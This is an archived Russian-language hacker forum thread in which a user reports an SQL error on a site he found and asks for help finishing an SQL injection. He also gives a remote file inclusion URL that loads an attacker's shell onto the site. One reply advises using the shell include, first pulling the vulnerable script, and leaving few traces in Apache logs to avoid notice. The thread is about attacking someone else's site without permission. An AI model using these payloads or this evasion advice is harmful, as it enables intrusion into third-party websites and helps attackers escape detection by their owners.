HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL или просто недоработки
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL или просто недоработки
  #1  
Старый 22.12.2008, 12:53
Ilia_dozor
Познающий
Регистрация: 26.05.2007
Сообщений: 49
С нами: 9979542

Репутация: 4
По умолчанию SQL или просто недоработки
Нашел этот сайт смотри тута потом сделал вот http://наш сайт.com/?show=item&item=%D1%8D&cur=' и видим

Query Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

видать,дело пахнет керосином...а вот если сделать http://этот сайт.com/?load=http://ваш шелл то вообще весело

помогите довести sql до конца
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.12.2008, 13:00
TAKO
Banned
Регистрация: 17.12.2008
Сообщений: 9
С нами: 9157201

Репутация: 3
По умолчанию
Обычная ошибка. Не уязвимость
 
Ответить с цитированием

  #3  
Старый 22.12.2008, 13:55
furang
Познающий
Регистрация: 07.04.2007
Сообщений: 88
С нами: 10050808

Репутация: 48
По умолчанию
если есть возможность заинклудить шелл, то зачем мудохатся с инъекцией?
А если так уж охота провести инъекцию, то я в твоем случае для начала сливаю сам скрипт в котором потенциальная бага, ищу есть ли там ошибка, и только потом организовую атаку. На апаче ведь логи ведутся, и чем меньше наследишь тем больше вероятность остаться незамеченным.

ЗЫ. Кстати даже если ты можешь влиять на запрос, то не всегда есть возможность напакостить. Порой стоят оч неплохе фильтры.
 
Ответить с цитированием

  #4  
Старый 22.12.2008, 18:00
Ilia_dozor
Познающий
Регистрация: 26.05.2007
Сообщений: 49
С нами: 9979542

Репутация: 4
По умолчанию
ну как вам сказать-шелл не коннектится...нинай пачму
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
SQL Injection в форумах Dracula4ever Статьи 13 05.09.2006 16:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...